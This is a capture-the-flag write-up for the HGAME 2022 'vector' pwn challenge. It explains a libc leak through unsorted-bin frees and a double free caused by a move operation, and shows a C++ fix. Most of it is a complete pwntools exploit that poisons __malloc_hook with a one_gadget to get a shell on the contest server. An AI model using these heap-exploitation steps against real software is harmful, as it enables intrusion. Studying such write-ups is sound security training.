PWN-COMPETITION-HGAME2022-Week4
vector
A pwn challenge written in C++ that implements a vector. There is no edit function, but a move function has been added.
On add or move, if the supplied index is greater than the vector's current size, the vector is resized to grow.
The chunk used by the old vector is freed automatically and goes into the corresponding bin, while the data is transferred into the new vector.
Using the vector growth triggered by add, a chunk with size greater than 0x410 gets freed into the unsorted bin, which leaks libc.
Using the vector growth triggered by move, two elements of the new vector can be made to point at the same chunk, which gives a double free.
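As an added example (not the challenge binary's source or the author's code; struct and function names are assumed), a minimal C++ model of the vector-of-chunk-pointers design described above: the raw-pointer version shows why copying a slot on move leaves two owners of one chunk, and the std::unique_ptr version shows the fix, where the source slot is emptied so freeing either index afterwards cannot release the same chunk twice.

```cpp
// Added example (not the challenge's code; names assumed): buggy vector move beside a fix.
#include <cstdlib>
#include <memory>
#include <set>
#include <vector>
// Buggy shape: raw owning pointers; move() copies the pointer, so source
// and destination slots both "own" the same chunk afterwards.
struct RawVec {
    std::vector<char*> slots;
    void add(std::size_t index, std::size_t size) {
        if (index >= slots.size()) slots.resize(index + 1, nullptr);
        slots[index] = static_cast<char*>(std::calloc(1, size ? size : 1));
    }
    void move(std::size_t from, std::size_t to) {
        if (to >= slots.size()) slots.resize(to + 1, nullptr);
        slots[to] = slots[from];  // BUG: slots[from] is not cleared
    }
    // Slots aliasing an earlier slot; > 0 means freeing both indexes
    // would release the same chunk twice (the double free in the writeup).
    std::size_t aliased() const {
        std::set<char*> seen; std::size_t n = 0;
        for (char* p : slots) if (p && !seen.insert(p).second) ++n;
        return n;
    }
    ~RawVec() {  // release each distinct allocation exactly once
        std::set<char*> seen;
        for (char* p : slots) if (p && seen.insert(p).second) std::free(p);
    }
};
// Hardened shape: unique ownership; move() transfers the pointer and
// empties the source slot, so freeing the old index is a harmless no-op.
struct SafeVec {
    std::vector<std::unique_ptr<char[]>> slots;
    void add(std::size_t index, std::size_t size) {
        if (index >= slots.size()) slots.resize(index + 1);
        slots[index].reset(new char[size ? size : 1]());
    }
    void move(std::size_t from, std::size_t to) {
        if (to >= slots.size()) slots.resize(to + 1);
        slots[to].reset(slots[from].release());  // slots[from] becomes null
    }
    void del(std::size_t index) { slots[index].reset(); }  // idempotent
    bool empty_at(std::size_t i) const { return !slots[i]; }
};
std::size_t raw_alias_count_after_move() {  // returns 1
    RawVec v; v.add(12, 0x68); v.move(12, 262); return v.aliased();
}
bool safe_move_leaves_single_owner() {  // returns true
    SafeVec v; v.add(12, 0x68); v.move(12, 262);
    v.del(12); v.del(262); v.del(262); return v.empty_at(12) && v.empty_at(262);
}
```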
```python
from pwn import *
from pwnlib.util.iters import mbruteforce
import itertools
import hashlib
import string  # needed for string.printable; missing from the original listing

# Written against Python 2 pwntools (str fill in ljust, str == str in the
# proof-of-work compare); under Python 3 the received bytes would need decoding.
is_remote = 1
io = remote("chuj.top", 53180)
elf = ELF("./vector")
libc = ELF("./libc.so.6")

# proof of work: brute-force the 4 printable characters whose sha256 matches
io.recvuntil("sha256(????) == ")
code = io.recvuntil("\n")[:-1]
charset = string.printable
proof = mbruteforce(lambda x: hashlib.sha256((x).encode()).hexdigest() == code,
                    charset, 4, method='fixed')
io.sendlineafter("????> ", proof)

def add(index, size, content):
    io.sendlineafter(">> ", "1")
    io.sendlineafter("ndex?\n>> ", str(index))
    io.sendlineafter("size?\n>> ", str(size))
    io.sendafter("content?\n>> ", content)

def show(index):
    io.sendlineafter(">> ", "3")
    io.sendlineafter("ndex?\n>> ", str(index))

def free(index):
    io.sendlineafter(">> ", "4")
    io.sendlineafter("ndex?\n>> ", str(index))

def move(index, index_move_to):
    io.sendlineafter(">> ", "5")
    for i in range(index):
        io.sendlineafter("[1/0]\n>> ", "0")
    io.sendlineafter("[1/0]\n>> ", "1")
    if is_remote:  # the remote build prompts "copy to?", the local one "move to?"
        io.sendlineafter("copy to?\n>> ", str(index_move_to))
    else:
        io.sendlineafter("move to?\n>> ", str(index_move_to))

# grow the vector so the old, large backing chunk is freed into the unsorted bin
add(0, 0x18, "a"*8)
add(130, 0x18, "b"*8)
add(132, 0, "")
show(132)
libc_base = u64(io.recvuntil("\x7f")[-6:].ljust(8, "\x00")) - 0x1EBFD0
print("libc_base==" + hex(libc_base))
__malloc_hook = libc_base + libc.sym["__malloc_hook"]
print("__malloc_hook==" + hex(__malloc_hook))
realloc = libc_base + libc.sym["realloc"]
print("realloc==" + hex(realloc))
__free_hook = libc_base + libc.sym["__free_hook"]
print("__free_hook==" + hex(__free_hook))
oggs = [0xe6c7e, 0xe6c81, 0xe6c84]
ogg = libc_base + oggs[0]
print("ogg==" + hex(ogg))

# move() leaves two elements pointing at the same chunk, giving a double free
for i in range(1, 5):
    add(i, 0x100-8, "d"*8)
for i in range(5, 12):
    add(i, 0x68, "e"*8)
add(12, 0x68, "f"*8)
add(13, 0x68, "g"*8)
move(12, 262)
for i in range(5, 12):
    free(i)
free(12)
free(13)
free(262)
for i in range(5, 12):
    add(i, 0x68, "e"*8)
print("__malloc_hook==" + hex(__malloc_hook))
add(14, 0x68, p64(__malloc_hook - 0x8))
add(15, 0x68, "P1umH0")
add(16, 0x68, "P1umH0")
print("ogg==" + hex(ogg))
add(17, 0x68, p64(ogg) + p64(realloc))

# trigger malloc so the overwritten hook is called
io.sendlineafter(">> ", "1")
io.sendlineafter("ndex?\n>> ", str(18))
io.sendlineafter("size?\n>> ", str(0))
io.sendline("cat flag")
io.interactive()
```